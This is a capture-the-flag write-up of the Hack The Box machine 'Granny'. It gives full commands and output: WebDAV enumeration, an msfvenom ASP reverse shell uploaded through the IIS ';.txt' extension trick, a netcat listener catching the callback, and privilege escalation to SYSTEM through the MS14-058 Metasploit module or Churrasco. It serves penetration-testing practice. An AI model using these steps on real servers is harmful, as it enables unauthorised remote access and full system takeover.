Hack The Box : Granny
24 July, 2021
Beginning with an nmap scan
# nmap -A -sC -sV -O 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.15
Host is up (0.50s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Sat, 24 Jul 2021 08:11:46 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (94%), BT embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_ce:5.0.1400 cpe:/h:btvision:btvision%2b_box
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (94%), Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows 2000 Server SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 398.52 ms 10.10.16.1
2 588.23 ms 10.10.10.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.08 seconds
Only an HTTP server running on port 80. The WebDAV scan output looks interesting, it allows the PUT method.
Next I ran gobuster and some paths were revealed, though they didn't contain anything interesting.
# ./gobuster dir -r -w ./wordlists/common.txt -u http://10.10.10.15/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/Images (Status: 200) [Size: 242]
/_private (Status: 200) [Size: 246]
/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
/_vti_bin/shtml.dll (Status: 200) [Size: 96]
/_vti_bin (Status: 200) [Size: 759]
/_vti_log (Status: 200) [Size: 246]
/aspnet_client (Status: 200) [Size: 369]
/images (Status: 200) [Size: 242]
===============================================================
Finished
===============================================================
From the WebDAV HackTricks page, I learnt the following about pentesting WebDAV:
- A tool called
davtest, it can be used to test the upload and execution capabilities of a remote WebDAV server. - A tool called
cadaverthat can be used to perform certain operations on WebDAV servers - A vulnerability in IIS 5/6 that can bypass execution restrictions on WebDAV servers
So I ran davtest first
# davtest -url http://10.10.10.15/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: z_fPS8f4
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_z_fPS8f4
********************************************************
Sending test files
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jhtml
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.pl
PUT asp FAIL
PUT php SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.php
PUT html SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jsp
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
PUT cgi FAIL
PUT aspx FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.cfm
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC jhtml FAIL
EXEC pl FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
EXEC jsp FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_z_fPS8f4
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jhtml
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.pl
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.php
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.jsp
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
PUT File: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.cfm
Executes: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.html
Executes: http://10.10.10.15/DavTestDir_z_fPS8f4/davtest_z_fPS8f4.txt
Based on the vulnerability I created an ASP reverse shell, uploaded it as a text file and moved it as an ASP file
dav:/> put reverse.txt
Uploading reverse.txt to `/reverse.txt':
Progress: [=============================>] 100.0% of 38481 bytes succeeded.
dav:/> copy reverse.txt reverse.asp;.txt
Copying `/reverse.txt' to `/reverse.asp%3b.txt': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_z_fPS8f4 0 Jul 24 06:42
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
reverse.asp;.txt 38481 Jul 24 07:09
reverse.txt 38481 Jul 24 07:09
dav:/> move reverse.txt reverse.asp;.txt
Moving `/reverse.txt' to `/reverse.asp%3b.txt': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_z_fPS8f4 0 Jul 24 06:42
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
reverse.asp;.txt 38481 Jul 24 07:09
I used msfvenom to create the ASP reverse shell
# msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.174 LPORT=4444 > reverse.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38481 bytes
On visiting the path /reverse.asp;.txt, the reverse shell was caught!
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.15] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
I couldn't access the user or the administrator directories
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 10:19 PM <DIR> .
04/12/2017 10:19 PM <DIR> ..
04/12/2017 09:48 PM <DIR> Administrator
04/12/2017 05:03 PM <DIR> All Users
04/12/2017 10:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,123,759,616 bytes free
C:\Documents and Settings>cd Lakis
cd Lakis
Access is denied.
C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.
One thing I found, the transferred files were landing in "C:\Inetpub\wwwroot", this is the default directory for serving web content through IIS https://stackify.com/what-is-inetpub/
I looked for exploits using windows-exploit-suggester
# python2 windows-exploit-suggester2.7.py --database 2021-07-22-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
With Metasploit
After trying out a lot of the exploits, none of them seemed to work so I decided to use Metasploit with a different exploit that I found after searching on the internet
msf6 exploit(windows/local/ms14_058_track_popup_menu) > exploit
[*] Started reverse TCP handler on 10.10.16.174:4443
[*] Launching notepad to host the exploit...
[+] Process 3152 launched.
[*] Reflectively injecting the exploit DLL into 3152...
[*] Injecting exploit into 3152...
[*] Exploit injected. Injecting payload into 3152...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.16.174:4443 -> 10.10.10.15:1042) at 2021-07-24 08:20:23 -0400
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd "C:\Documents and Settings"
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-04-12 10:12:15 -0400 Administrator
40777/rwxrwxrwx 0 dir 2017-04-12 09:42:38 -0400 All Users
40777/rwxrwxrwx 0 dir 2017-04-12 09:42:38 -0400 Default User
40777/rwxrwxrwx 0 dir 2017-04-12 15:19:46 -0400 Lakis
40777/rwxrwxrwx 0 dir 2017-04-12 10:08:32 -0400 LocalService
40777/rwxrwxrwx 0 dir 2017-04-12 10:08:31 -0400 NetworkService
meterpreter > cat Lakis/Desktop/user.txt
<flag>
meterpreter > cat Administrator/Desktop/root.txt
<flag>
Without Metasploit
The same exploit has an executable as well which means it can be used without metasploit too https://github.com/Re4son/Churrasco
Transfer it to the machine, and run a reverse shell exe (created using msfvenom) as an argument
C:\Inetpub\wwwroot>churrasco.exe "whoami"
churrasco.exe "whoami"
nt authority\system